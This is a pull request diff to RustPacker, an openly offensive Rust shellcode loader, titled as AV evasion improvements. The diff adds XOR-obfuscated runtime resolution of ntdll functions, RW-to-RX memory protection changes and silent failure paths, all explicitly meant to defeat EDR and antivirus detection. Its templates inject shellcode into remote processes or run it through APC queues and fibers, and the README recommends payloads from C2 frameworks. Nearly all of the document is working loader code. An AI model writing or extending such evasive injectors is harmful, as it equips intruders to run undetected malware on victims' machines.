### PR TITLE
feat: critical AV evasion improvements across all templates

### DIFF
--- a/README.md
+++ b/README.md
@@ -130,33 +130,38 @@ rustpacker -f shared/payload.raw -i ntcrt -e aes -b exe -o shared/my_binary.exe
 
 These templates inject shellcode into a remote process. Use `-t <process_name>` to specify the target (default: `dllhost.exe`). The target process name is **case sensitive**.
 
-| Template | API Level | Indirect Syscalls | Description |
-|----------|-----------|:-----------------:|-------------|
-| `wincrt` | High (Windows-rs) | ❌ | CreateRemoteThread via the official Windows crate |
-| `ntcrt` | Low (ntapi) | ❌ | NtCreateThreadEx via NT native API |
-| `syscrt` | Syscall | ✅ | NtCreateThreadEx via indirect syscalls |
+| Template | API Level | Indirect Syscalls | Dynamic API | Description |
+|----------|-----------|:-----------------:|:-----------:|-------------|
+| `wincrt` | High (Windows-rs) | ❌ | ❌ | CreateRemoteThread via the official Windows crate |
+| `ntcrt` | Low (ntapi) | ❌ | ✅ | NtCreateThreadEx via dynamic NT API resolution |
+| `syscrt` | Syscall | ✅ | ❌ | NtCreateThreadEx via indirect syscalls |
 
 ### Self-Execution Templates
 
 These templates execute shellcode within the current process. No target process needed.
 
-| Template | API Level | Indirect Syscalls | Description |
-|----------|-----------|:-----------------:|-------------|
-| `ntapc` | Low (ntapi) | ❌ | Queue APC to current thread, trigger with NtTestAlert |
-| `winfiber` | High (windows-sys) | ❌ | Fiber-based execution via Windows API |
-| `ntfiber` | Low (ntapi + windows-sys) | ❌ | Fiber-based execution via NT native API |
-| `sysfiber` | Syscall (ntapi + windows-sys) | ✅ | Fiber-based execution via indirect syscalls |
+| Template | API Level | Indirect Syscalls | Dynamic API | Description |
+|----------|-----------|:-----------------:|:-----------:|-------------|
+| `ntapc` | Low (ntapi) | ❌ | ✅ | Queue APC to current thread via dynamic NT API resolution |
+| `winfiber` | High (windows-sys) | ❌ | ❌ | Fiber-based execution via Windows API |
+| `ntfiber` | Low (ntapi + windows-sys) | ❌ | ✅ | Fiber-based execution via dynamic NT API resolution |
+| `sysfiber` | Syscall (ntapi + windows-sys) | ✅ | ❌ | Fiber-based execution via indirect syscalls |
 
 ## 🔒 Detection Evasion
 
 RustPacker implements several evasion techniques:
 
+- **No RWX Memory**: Memory is allocated as RW, written, then re-protected as RX only — never RWX. This eliminates a major behavioral detection signal used by EDR/AV.
+- **Dynamic API Resolution** (`nt*` templates): NT API functions are resolved at runtime via `GetProcAddress` with XOR-obfuscated function names (random key per build). This removes suspicious ntdll imports from the PE import table.
 - **Indirect Syscalls**: Bypass user-mode hooks (`syscrt`, `sysfiber` templates)
 - **Payload Encryption**: XOR encoding, AES-256-CBC encryption, or UUID-based encoding
 - **Process Injection**: Hide execution in legitimate processes
 - **Domain Pinning**: Only detonate on a specific domain (sandbox evasion)
+- **Silent Failures**: No descriptive error messages in the binary — all failures exit silently to avoid IoC string detection
 - **Template Variety**: Multiple execution methods to avoid static signatures
 - **Rust Compilation**: Native binaries with stripped symbols and LTO
+
+> ⚠️ **Breaking Change**: Since RWX (PAGE_EXECUTE_READWRITE) is no longer used, **self-modifying / dynamic shellcode is not supported**. Only static shellcode payloads are compatible. Most C2 frameworks (Metasploit, Sliver, Cobalt Strike, Havoc) generate static shellcode by default — this should not affect typical usage.
 
 ## ⚙️ Local Installation
 

--- a/src/puzzle.rs
+++ b/src/puzzle.rs
@@ -14,6 +14,20 @@ use std::path::{Path, PathBuf};
 use std::process::exit;
 use std::time::{SystemTime, UNIX_EPOCH};
 
+fn obfuscate_api_name(name: &str, key: u8) -> String {
+    let bytes: Vec<String> = name.bytes().map(|b| format!("0x{:02x}", b ^ key)).collect();
+    format!("[{}]", bytes.join(", "))
+}
+
+fn non_zero_random_key() -> u8 {
+    loop {
+        let k = random_u8();
+        if k != 0 {
+            return k;
+        }
+    }
+}
+
 const OUTPUT_DIR: &str = "shared";
 
 fn search_and_replace(
@@ -123,6 +137,16 @@ fn build_replacements(order: &Order, src_dir: &Path) -> HashMap<&'static str, St
         replacements.insert("{{SANDBOX}}", sandbox_output.sandbox_function);
         replacements.insert("{{SANDBOX_IMPORTS}}", sandbox_output.sandbox_import);
     }
+
+    let api_key = non_zero_random_key();
+    replacements.insert("{{API_KEY}}", format!("0x{:02x}", api_key));
+    replacements.insert("{{OBF_NT_OPEN_PROCESS}}", obfuscate_api_name("NtOpenProcess", api_key));
+    replacements.insert("{{OBF_NT_ALLOCATE_VIRTUAL_MEMORY}}", obfuscate_api_name("NtAllocateVirtualMemory", api_key));
+    replacements.insert("{{OBF_NT_WRITE_VIRTUAL_MEMORY}}", obfuscate_api_name("NtWriteVirtualMemory", api_key));
+    replacements.insert("{{OBF_NT_PROTECT_VIRTUAL_MEMORY}}", obfuscate_api_name("NtProtectVirtualMemory", api_key));
+    replacements.insert("{{OBF_NT_CREATE_THREAD_EX}}", obfuscate_api_name("NtCreateThreadEx", api_key));
+    replacements.insert("{{OBF_NT_QUEUE_APC_THREAD}}", obfuscate_api_name("NtQueueApcThread", api_key));
+    replacements.insert("{{OBF_NT_TEST_ALERT}}", obfuscate_api_name("NtTestAlert", api_key));
 
     replacements
 }

--- a/templates/ntAPC/Cargo.toml
+++ b/templates/ntAPC/Cargo.toml
@@ -8,9 +8,7 @@ edition = "2021"
 {{DLL_FORMAT}}
 
 [dependencies]
-sysinfo = "0.38"
-ntapi = { version = "0.4", features = ["impl-default"] }
-winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default"] }
+winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "libloaderapi"] }
 {{DEPENDENCIES}}
 
 [profile.release]

--- a/templates/ntAPC/src/main.rs
+++ b/templates/ntAPC/src/main.rs
@@ -1,65 +1,85 @@
 #![windows_subsystem = "windows"] 
 #![allow(non_snake_case)]
 
+use std::ffi::CString;
+use std::include_bytes;
+use std::ptr::null_mut;
+
 use winapi::{
     um::{
-        winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE}
+        winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PAGE_EXECUTE_READ},
+        libloaderapi::{GetModuleHandleA, GetProcAddress},
     },
     shared::{
-        ntdef::{NT_SUCCESS}
-    }
+        ntdef::{NT_SUCCESS, HANDLE},
+    },
+    ctypes::c_void,
 };
-use winapi::ctypes::c_void;
-use ntapi::ntpsapi::PPS_APC_ROUTINE;
-use winapi::um::winnt::PAGE_EXECUTE_READWRITE;
-use std::{ptr::null_mut};
-use ntapi::ntpsapi::NtCurrentProcess;
-use ntapi::ntpsapi::NtCurrentThread; 
-use ntapi::ntmmapi::NtAllocateVirtualMemory;
-use ntapi::ntmmapi::NtWriteVirtualMemory;
-use ntapi::ntmmapi::NtProtectVirtualMemory;
-use ntapi::ntpsapi::NtQueueApcThread;
-use ntapi::ntpsapi::NtTestAlert;
-//use winapi::um::sysinfoapi::GetPhysicallyInstalledSystemMemory;
 
-
-use std::include_bytes;
 {{IMPORTS}}
 
 {{SANDBOX_IMPORTS}}
 
 {{DECRYPTION_FUNCTION}}
 
+type ApcRoutine = Option<unsafe extern "system" fn(*mut c_void, *mut c_void, *mut c_void)>;
+
+const K: u8 = {{API_KEY}};
+const OBF_B: &[u8] = &{{OBF_NT_ALLOCATE_VIRTUAL_MEMORY}};
+const OBF_C: &[u8] = &{{OBF_NT_WRITE_VIRTUAL_MEMORY}};
+const OBF_D: &[u8] = &{{OBF_NT_PROTECT_VIRTUAL_MEMORY}};
+const OBF_F: &[u8] = &{{OBF_NT_QUEUE_APC_THREAD}};
+const OBF_G: &[u8] = &{{OBF_NT_TEST_ALERT}};
+
+fn r(d: &[u8]) -> Vec<u8> {
+    d.iter().map(|b| b ^ K).collect()
+}
+
+unsafe fn g(n: &[u8]) -> *const () {
+    let h = GetModuleHandleA(b"ntdll\0".as_ptr() as *const i8);
+    let s = r(n);
+    let c = CString::new(s).unwrap();
+    GetProcAddress(h, c.as_ptr()) as *const ()
+}
+
+type FB = unsafe extern "system" fn(HANDLE, *mut *mut c_void, usize, *mut usize, u32, u32) -> i32;
+type FC = unsafe extern "system" fn(HANDLE, *mut c_void, *mut c_void, usize, *mut usize) -> i32;
+type FD = unsafe extern "system" fn(HANDLE, *mut *mut c_void, *mut usize, u32, *mut u32) -> i32;
+type FF = unsafe extern "system" fn(HANDLE, ApcRoutine, *mut c_void, *mut c_void, *mut c_void) -> i32;
+type FG = unsafe extern "system" fn() -> i32;
+
 fn enhance(mut buf: Vec<u8>) {
+    let current_process: HANDLE = -1isize as HANDLE;
+    let current_thread: HANDLE = -2isize as HANDLE;
+
     unsafe {
-        let mut allocstart : *mut c_void = null_mut();
-        let mut size : usize = buf.len();
-        let alloc_status = NtAllocateVirtualMemory(NtCurrentProcess, &mut allocstart, 0, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-        if !NT_SUCCESS(alloc_status) {
-            panic!("Error allocating memory to the local process: {}", alloc_status);
-        }
+        let f_alloc: FB = std::mem::transmute(g(OBF_B));
+        let f_write: FC = std::mem::transmute(g(OBF_C));
+        let f_protect: FD = std::mem::transmute(g(OBF_D));
+        let f_queue: FF = std::mem::transmute(g(OBF_F));
+        let f_alert: FG = std::mem::transmute(g(OBF_G));
+
+        let mut base: *mut c_void = null_mut();
+        let mut size: usize = buf.len();
+        let s = f_alloc(current_process, &mut base, 0, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+        if !NT_SUCCESS(s) { return; }
         
-        let mut byteswritten = 0;
-        let buffer = buf.as_mut_ptr() as *mut c_void;
-        let mut buffer_length = buf.len();
-        let write_status = NtWriteVirtualMemory(NtCurrentProcess, allocstart, buffer, buffer_length, &mut byteswritten);
-        if !NT_SUCCESS(write_status) {
-            panic!("Error writing to the local process: {}", write_status);
-        }
+        let mut written = 0;
+        let ptr = buf.as_mut_ptr() as *mut c_void;
+        let len = buf.len();
+        let s = f_write(current_process, base, ptr, len, &mut written);
+        if !NT_SUCCESS(s) { return; }
 
-        let mut old_perms = PAGE_READWRITE;
-        let protect_status = NtProtectVirtualMemory(NtCurrentProcess, &mut allocstart, &mut buffer_length, PAGE_EXECUTE_READWRITE, &mut old_perms);
-        if !NT_SUCCESS(protect_status) {
-            panic!("[-] Failed to call NtProtectVirtualMemory: {:#x}", protect_status);
-        }
+        let mut old: u32 = PAGE_READWRITE;
+        let mut psize = len;
+        let s = f_protect(current_process, &mut base, &mut psize, PAGE_EXECUTE_READ, &mut old);
+        if !NT_SUCCESS(s) { return; }
 
-        let apc = NtQueueApcThread(NtCurrentThread, Some(std::mem::transmute::<*mut c_void, unsafe extern "C" fn(*mut c_void, *mut c_void, *mut c_void)>(allocstart)) as PPS_APC_ROUTINE, allocstart, null_mut(), null_mut());
-        // thanks to https://github.com/trickster0/OffensiveRust/blob/c7629a285e8128348d7d7239e25db858064ad0e2/Injection_AES_Loader/src/main.rs
-        if !NT_SUCCESS(apc) {
-            panic!("Error failed to call QueueUqerAPC: {}", apc);
-        }
+        let apc_routine: ApcRoutine = Some(std::mem::transmute(base));
+        let s = f_queue(current_thread, apc_routine, base, null_mut(), null_mut());
+        if !NT_SUCCESS(s) { return; }
 
-        NtTestAlert();
+        f_alert();
     }
 }
 
@@ -67,17 +87,6 @@ fn main() {
     {{SANDBOX}}
     
     let buf = include_bytes!({{PATH_TO_SHELLCODE}});
-    // Removing the sandobox check for now, as it fails on numerous Windows versions.
-    /*
-    let mut memory = 0;
-    unsafe {
-        let is_quicksand = GetPhysicallyInstalledSystemMemory(&mut memory);
-        println!("{:#?}", is_quicksand);
-        if is_quicksand != 1 {
-            panic!("Hello.")
-        }
-    }
-    */
     let mut vec: Vec<u8> = Vec::new();
     for i in buf.iter() {
         vec.push(*i);

--- a/templates/ntCRT/Cargo.toml
+++ b/templates/ntCRT/Cargo.toml
@@ -9,8 +9,7 @@ edition = "2021"
 
 [dependencies]
 sysinfo = "0.38"
-ntapi = { version = "0.4", features = ["impl-default"] }
-winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "lmaccess"] }
+winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "lmaccess", "libloaderapi"] }
 {{DEPENDENCIES}}
 
 [profile.release]

--- a/templates/ntCRT/src/main.rs
+++ b/templates/ntCRT/src/main.rs
@@ -2,31 +2,21 @@
 #![allow(non_snake_case)]
 
 use sysinfo::System;
-use std::ffi::OsStr;
+use std::ffi::{CString, OsStr};
 use std::include_bytes;
+use std::ptr::null_mut;
 
 use winapi::{
     um::{
-        winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE},
-        lmaccess::{ACCESS_ALL}
+        winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PAGE_EXECUTE_READ, THREAD_ALL_ACCESS},
+        lmaccess::ACCESS_ALL,
+        libloaderapi::{GetModuleHandleA, GetProcAddress},
     },
     shared::{
-        ntdef::{OBJECT_ATTRIBUTES, HANDLE, NT_SUCCESS}
-    }
+        ntdef::{OBJECT_ATTRIBUTES, HANDLE, NT_SUCCESS},
+    },
+    ctypes::c_void,
 };
-use winapi::ctypes::c_void;
-use winapi::um::winnt::PAGE_EXECUTE_READWRITE;
-use ntapi::ntpsapi::THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER;
-use std::{ptr::null_mut};
-use winapi::um::winnt::THREAD_ALL_ACCESS;
-use ntapi::ntapi_base::CLIENT_ID;
-use ntapi::ntpsapi::NtOpenProcess;
-use ntapi::ntmmapi::NtAllocateVirtualMemory;
-use ntapi::ntmmapi::NtWriteVirtualMemory;
-use ntapi::ntmmapi::NtProtectVirtualMemory;
-use ntapi::ntpsapi::NtCreateThreadEx;
-//use winapi::um::sysinfoapi::GetPhysicallyInstalledSystemMemory;
-
 
 {{IMPORTS}}
 
@@ -34,78 +24,90 @@ use ntapi::ntpsapi::NtCreateThreadEx;
 
 {{DECRYPTION_FUNCTION}}
 
+const HIDE_FROM_DEBUGGER: u32 = 0x4;
+
+#[repr(C)]
+struct CID {
+    proc_id: HANDLE,
+    thread_id: HANDLE,
+}
+
+const K: u8 = {{API_KEY}};
+const OBF_A: &[u8] = &{{OBF_NT_OPEN_PROCESS}};
+const OBF_B: &[u8] = &{{OBF_NT_ALLOCATE_VIRTUAL_MEMORY}};
+const OBF_C: &[u8] = &{{OBF_NT_WRITE_VIRTUAL_MEMORY}};
+const OBF_D: &[u8] = &{{OBF_NT_PROTECT_VIRTUAL_MEMORY}};
+const OBF_E: &[u8] = &{{OBF_NT_CREATE_THREAD_EX}};
+
+fn r(d: &[u8]) -> Vec<u8> {
+    d.iter().map(|b| b ^ K).collect()
+}
+
+unsafe fn g(n: &[u8]) -> *const () {
+    let h = GetModuleHandleA(b"ntdll\0".as_ptr() as *const i8);
+    let s = r(n);
+    let c = CString::new(s).unwrap();
+    GetProcAddress(h, c.as_ptr()) as *const ()
+}
+
+type FA = unsafe extern "system" fn(*mut HANDLE, u32, *mut OBJECT_ATTRIBUTES, *mut CID) -> i32;
+type FB = unsafe extern "system" fn(HANDLE, *mut *mut c_void, usize, *mut usize, u32, u32) -> i32;
+type FC = unsafe extern "system" fn(HANDLE, *mut c_void, *mut c_void, usize, *mut usize) -> i32;
+type FD = unsafe extern "system" fn(HANDLE, *mut *mut c_void, *mut usize, u32, *mut u32) -> i32;
+type FE = unsafe extern "system" fn(*mut HANDLE, u32, *mut c_void, HANDLE, *mut c_void, *mut c_void, u32, usize, usize, usize, *mut c_void) -> i32;
+
 fn boxboxbox(tar: &str) -> Vec<usize> {
-    // search for processes to inject into
     let mut dom: Vec<usize> = Vec::new();
     let s = System::new_all();
     for pro in s.processes_by_exact_name(OsStr::new(tar)) {
-        //println!("{} {}", pro.pid(), pro.name());
         dom.push(usize::try_from(pro.pid().as_u32()).unwrap());
     }
     dom
 }
 
 fn enhance(mut buf: Vec<u8>, tar: usize) {
-    // injecting in target processes :)
     let mut process_handle = tar as HANDLE;
     let mut oa = OBJECT_ATTRIBUTES::default();
-    let mut ci = CLIENT_ID {
-        UniqueProcess: process_handle,
-        UniqueThread: null_mut(),
+    let mut ci = CID {
+        proc_id: process_handle,
+        thread_id: null_mut(),
     };
 
     unsafe {
-        let open_status = NtOpenProcess(&mut process_handle, ACCESS_ALL, &mut oa, &mut ci);
-        if !NT_SUCCESS(open_status) {
-            panic!("Error opening process: {}", open_status);
-        }
+        let f_open: FA = std::mem::transmute(g(OBF_A));
+        let f_alloc: FB = std::mem::transmute(g(OBF_B));
+        let f_write: FC = std::mem::transmute(g(OBF_C));
+        let f_protect: FD = std::mem::transmute(g(OBF_D));
+        let f_thread: FE = std::mem::transmute(g(OBF_E));
 
-        let mut allocstart : *mut c_void = null_mut();
-        let mut size : usize = buf.len();
-        let alloc_status = NtAllocateVirtualMemory(process_handle, &mut allocstart, 0, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-        if !NT_SUCCESS(alloc_status) {
-            panic!("Error allocating memory to the target process: {}", alloc_status);
-        }
-        let mut byteswritten = 0;
-        let buffer = buf.as_mut_ptr() as *mut c_void;
-        let mut buffer_length = buf.len();
-        let write_status = NtWriteVirtualMemory(process_handle, allocstart, buffer, buffer_length, &mut byteswritten);
-        if !NT_SUCCESS(write_status) {
-            panic!("Error writing to the target process: {}", write_status);
-        }
+        let s = f_open(&mut process_handle, ACCESS_ALL, &mut oa, &mut ci);
+        if !NT_SUCCESS(s) { return; }
 
-        let mut old_perms = PAGE_READWRITE;
-        let protect_status = NtProtectVirtualMemory(process_handle, &mut allocstart, &mut buffer_length, PAGE_EXECUTE_READWRITE, &mut old_perms);
-        if !NT_SUCCESS(protect_status) {
-            panic!("[-] Failed to call NtProtectVirtualMemory: {:#x}", protect_status);
-        }
+        let mut base: *mut c_void = null_mut();
+        let mut size: usize = buf.len();
+        let s = f_alloc(process_handle, &mut base, 0, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+        if !NT_SUCCESS(s) { return; }
 
-        let mut thread_handle : *mut c_void = null_mut();
-        let write_thread = NtCreateThreadEx(&mut thread_handle, THREAD_ALL_ACCESS, null_mut(), process_handle, allocstart, null_mut(), THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER, 0_usize, 0_usize, 0_usize, null_mut());
+        let mut written = 0;
+        let ptr = buf.as_mut_ptr() as *mut c_void;
+        let len = buf.len();
+        let s = f_write(process_handle, base, ptr, len, &mut written);
+        if !NT_SUCCESS(s) { return; }
 
-        if !NT_SUCCESS(write_thread) {
-            panic!("Error failed to create remote thread: {}", write_thread);
-        }
+        let mut old: u32 = PAGE_READWRITE;
+        let mut psize = len;
+        let s = f_protect(process_handle, &mut base, &mut psize, PAGE_EXECUTE_READ, &mut old);
+        if !NT_SUCCESS(s) { return; }
+
+        let mut th: HANDLE = null_mut();
+        f_thread(&mut th, THREAD_ALL_ACCESS, null_mut(), process_handle, base, null_mut(), HIDE_FROM_DEBUGGER, 0, 0, 0, null_mut());
     }
 }
 
 fn main() {
     {{SANDBOX}}
     
-    // inject in the following processes:
     let tar: &str = "{{TARGET_PROCESS}}";
-
-    // Removing the sandobox check for now, as it fails on numerous Windows versions.
-    /*
-    let mut memory = 0;
-    unsafe {
-        let is_quicksand = GetPhysicallyInstalledSystemMemory(&mut memory);
-        println!("{:#?}", is_quicksand);
-        if is_quicksand != 1 {
-            panic!("Hello.")
-        }
-    }
-    */
 
     let buf = include_bytes!({{PATH_TO_SHELLCODE}});
     let mut vec: Vec<u8> = Vec::new();
@@ -113,9 +115,7 @@ fn main() {
         vec.push(*i);
     }
     let list: Vec<usize> = boxboxbox(tar);
-    if list.is_empty() {
-        panic!("[-] Unable to find a process.")
-    } else {
+    if !list.is_empty() {
         for i in &list {
             {{MAIN}}
             enhance(vec.clone(), *i);

--- a/templates/ntFIBER/Cargo.toml
+++ b/templates/ntFIBER/Cargo.toml
@@ -8,8 +8,7 @@ edition = "2021"
 {{DLL_FORMAT}}
 
 [dependencies]
-ntapi = { version = "0.4", features = ["impl-default"] }
-winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default"] }
+winapi = { version = "0.3", features = ["ntdef", "ntstatus", "impl-default", "libloaderapi"] }
 {{DEPENDENCIES}}
 
 

--- a/templates/ntFIBER/src/main.rs
+++ b/templates/ntFIBER/src/main.rs
@@ -1,24 +1,25 @@
 #![windows_subsystem = "windows"]
 #![allow(non_snake_case)]
 
+use std::ffi::CString;
+use std::include_bytes;
 use std::ptr::null_mut;
 
-use ntapi::ntmmapi::NtProtectVirtualMemory;
-use ntapi::ntmmapi::NtWriteVirtualMemory;
-use ntapi::{ntmmapi::NtAllocateVirtualMemory, ntpsapi::NtCurrentProcess};
-use winapi::ctypes::c_void;
 use winapi::{
-    shared::ntdef::NT_SUCCESS,
-    um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PAGE_READWRITE},
+    um::{
+        winnt::{MEM_COMMIT, PAGE_READWRITE, MEM_RESERVE, PAGE_EXECUTE_READ},
+        libloaderapi::{GetModuleHandleA, GetProcAddress},
+    },
+    shared::{
+        ntdef::{NT_SUCCESS, HANDLE},
+    },
+    ctypes::c_void,
 };
 use windows_sys::Win32::{
-    Foundation::GetLastError,
     System::Threading::{
         ConvertThreadToFiber, CreateFiberEx, SwitchToFiber, LPFIBER_START_ROUTINE,
     },
 };
-
-use std::include_bytes;
 
 {{IMPORTS}}
 
@@ -26,80 +27,57 @@ use std::include_bytes;
 
 {{DECRYPTION_FUNCTION}}
 
+const K: u8 = {{API_KEY}};
+const OBF_B: &[u8] = &{{OBF_NT_ALLOCATE_VIRTUAL_MEMORY}};
+const OBF_C: &[u8] = &{{OBF_NT_WRITE_VIRTUAL_MEMORY}};
+const OBF_D: &[u8] = &{{OBF_NT_PROTECT_VIRTUAL_MEMORY}};
+
+fn r(d: &[u8]) -> Vec<u8> {
+    d.iter().map(|b| b ^ K).collect()
+}
+
+unsafe fn g(n: &[u8]) -> *const () {
+    let h = GetModuleHandleA(b"ntdll\0".as_ptr() as *const i8);
+    let s = r(n);
+    let c = CString::new(s).unwrap();
+    GetProcAddress(h, c.as_ptr()) as *const ()
+}
+
+type FB = unsafe extern "system" fn(HANDLE, *mut *mut c_void, usize, *mut usize, u32, u32) -> i32;
+type FC = unsafe extern "system" fn(HANDLE, *mut c_void, *mut c_void, usize, *mut usize) -> i32;
+type FD = unsafe extern "system" fn(HANDLE, *mut *mut c_void, *mut usize, u32, *mut u32) -> i32;
+
 fn enhance(mut buf: Vec<u8>) {
+    let current_process: HANDLE = -1isize as HANDLE;
+
     unsafe {
-        // Execution method ported from Maldev Academy "Utilizing fibers for execution" module. Thanks Maldev !
+        let f_alloc: FB = std::mem::transmute(g(OBF_B));
+        let f_write: FC = std::mem::transmute(g(OBF_C));
+        let f_protect: FD = std::mem::transmute(g(OBF_D));
 
-        let mut allocstart: *mut c_void = null_mut();
+        let mut base: *mut c_void = null_mut();
         let mut size: usize = buf.len();
-        let alloc_status = NtAllocateVirtualMemory(
-            NtCurrentProcess,
-            &mut allocstart,
-            0,
-            &mut size,
-            MEM_COMMIT | MEM_RESERVE,
-            PAGE_READWRITE,
-        );
-        if !NT_SUCCESS(alloc_status) {
-            panic!(
-                "Error allocating memory to the local process: {}",
-                alloc_status
-            );
-        }
+        let s = f_alloc(current_process, &mut base, 0, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+        if !NT_SUCCESS(s) { return; }
 
-        let mut byteswritten = 0;
-        let buffer = buf.as_mut_ptr() as *mut c_void;
-        let mut buffer_length = buf.len();
-        let write_status = NtWriteVirtualMemory(
-            NtCurrentProcess,
-            allocstart,
-            buffer,
-            buffer_length,
-            &mut byteswritten,
-        );
-        if !NT_SUCCESS(write_status) {
-            panic!("Error writing to the local process: {}", write_status);
-        }
+        let mut written = 0;
+        let ptr = buf.as_mut_ptr() as *mut c_void;
+        let len = buf.len();
+        let s = f_write(current_process, base, ptr, len, &mut written);
+        if !NT_SUCCESS(s) { return; }
 
-        let mut old_perms = PAGE_READWRITE;
-        let protect_status = NtProtectVirtualMemory(
-            NtCurrentProcess,
-            &mut allocstart,
-            &mut buffer_length,
-            PAGE_EXECUTE_READWRITE,
-            &mut old_perms,
-        );
-        if !NT_SUCCESS(protect_status) {
-            panic!(
-                "[-] Failed to call NtProtectVirtualMemory: {:#x}",
-                protect_status
-            );
-        }
+        let mut old: u32 = PAGE_READWRITE;
+        let mut psize = len;
+        let s = f_protect(current_process, &mut base, &mut psize, PAGE_EXECUTE_READ, &mut old);
+        if !NT_SUCCESS(s) { return; }
 
-        let buf_ptr: LPFIBER_START_ROUTINE = std::mem::transmute(allocstart);
-
-        // Creating a new fiber
-        // move this call to CreateFiberEx, as CreateFiber calls CreateFiberEx
+        let buf_ptr: LPFIBER_START_ROUTINE = std::mem::transmute(base);
         let buf_fiber_address = CreateFiberEx(0, 0, 0, buf_ptr, null_mut());
+        if buf_fiber_address.is_null() { return; }
 
-        if buf_fiber_address.is_null() {
-            eprintln!("[!] CreateFiber Failed With Error: {}", GetLastError());
-            return;
-        }
-
-        // Convert the current thread to a fiber
-        // no need to move this call, already the lowest
         let primary_fiber_address = ConvertThreadToFiber(null_mut());
-        if primary_fiber_address.is_null() {
-            eprintln!(
-                "[!] ConvertThreadToFiber Failed With Error: {}",
-                GetLastError()
-            );
-            return;
-        }
+        if primary_fiber_address.is_null() { return; }
 
-        // Switch to the shellcode fiber
-        // no need to move this call, already the lowest
         SwitchToFiber(buf_fiber_address);
     }
 }

--- a/templates/sysCRT/src/main.rs
+++ b/templates/sysCRT/src/main.rs
@@ -16,7 +16,7 @@ use winapi::{
     }
 };
 use winapi::ctypes::c_void;
-use winapi::um::winnt::PAGE_EXECUTE_READWRITE;
+use winapi::um::winnt::PAGE_EXECUTE_READ;
 use winapi::um::winnt::THREAD_ALL_ACCESS;
 use std::{ptr::null_mut};
 use ntapi::ntapi_base::CLIENT_ID;
@@ -53,33 +53,33 @@ fn enhance(mut buf: Vec<u8>, tar: usize) {
     unsafe {
         let open_status = syscall!("NtOpenProcess", &mut process_handle, ACCESS_ALL, &mut oa, &mut ci);
         if !NT_SUCCESS(open_status) {
-            panic!("Error opening process: {}", open_status);
+            return;
         }
         let mut allocstart : *mut c_void = null_mut();
         let mut size : usize = buf.len();
         let alloc_status = syscall!("NtAllocateVirtualMemory", process_handle, &mut allocstart, 0, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
         if !NT_SUCCESS(alloc_status) {
-            panic!("Error allocating memory to the target process: {}", alloc_status);
+            return;
         }
         let mut byteswritten = 0;
         let buffer = buf.as_mut_ptr() as *mut c_void;
         let mut buffer_length = buf.len();
         let write_status = syscall!("NtWriteVirtualMemory", process_handle, allocstart, buffer, buffer_length, &mut byteswritten);
         if !NT_SUCCESS(write_status) {
-            panic!("Error writing to the target process: {}", write_status);
+            return;
         }
 
         let mut old_perms = PAGE_READWRITE;
-        let protect_status = syscall!("NtProtectVirtualMemory", process_handle, &mut allocstart, &mut buffer_length, PAGE_EXECUTE_READWRITE, &mut old_perms);
+        let protect_status = syscall!("NtProtectVirtualMemory", process_handle, &mut allocstart, &mut buffer_length, PAGE_EXECUTE_READ, &mut old_perms);
         if !NT_SUCCESS(protect_status) {
-            panic!("[-] Failed to call NtProtectVirtualMemory: {:#x}", protect_status);
+            return;
         }
 
         let mut thread_handle : *mut c_void = null_mut();
         let write_thread = syscall!("NtCreateThreadEx", &mut thread_handle, THREAD_ALL_ACCESS, NULL, process_handle, allocstart, NULL, THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER, 0_usize, 0_usize, 0_usize, NULL);
 
         if write_status != 0 {
-            panic!("Error failed to create remote thread: {:#02X}", write_thread);
+            return;
         }
     }
 }
@@ -107,7 +107,7 @@ fn main() {
     }
     let list: Vec<usize> = boxboxbox(tar);
     if list.is_empty() {
-        panic!("[-] Unable to find a process.")
+        return;
     } else {
         for i in &list {
             {{MAIN}}

--- a/templates/sysFIBER/src/main.rs
+++ b/templates/sysFIBER/src/main.rs
@@ -8,10 +8,9 @@ use rust_syscalls::syscall;
 use winapi::ctypes::c_void;
 use winapi::{
     shared::ntdef::NT_SUCCESS,
-    um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PAGE_READWRITE},
+    um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READ, PAGE_READWRITE},
 };
 use windows_sys::Win32::{
-    Foundation::GetLastError,
     System::Threading::{
         ConvertThreadToFiber, CreateFiberEx, SwitchToFiber, LPFIBER_START_ROUTINE,
     },
@@ -34,7 +33,7 @@ fn enhance(mut buf: Vec<u8>) {
         let mut size: usize = buf.len();
         let alloc_status = syscall!("NtAllocateVirtualMemory", NtCurrentProcess, &mut allocstart, 0_usize, &mut size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
         if !NT_SUCCESS(alloc_status) {
-            panic!("Error allocating memory to the local process: {}", alloc_status);
+            return;
         }
 
         let mut byteswritten = 0;
@@ -42,13 +41,13 @@ fn enhance(mut buf: Vec<u8>) {
         let mut buffer_length = buf.len();
         let write_status = syscall!("NtWriteVirtualMemory", NtCurrentProcess, allocstart, buffer, buffer_length, &mut byteswritten);
         if !NT_SUCCESS(write_status) {
-            panic!("Error writing to the local process: {}", write_status);
+            return;
         }
 
         let mut old_perms = PAGE_READWRITE;
-        let protect_status = syscall!("NtProtectVirtualMemory", NtCurrentProcess, &mut allocstart, &mut buffer_length, PAGE_EXECUTE_READWRITE, &mut old_perms);
+        let protect_status = syscall!("NtProtectVirtualMemory", NtCurrentProcess, &mut allocstart, &mut buffer_length, PAGE_EXECUTE_READ, &mut old_perms);
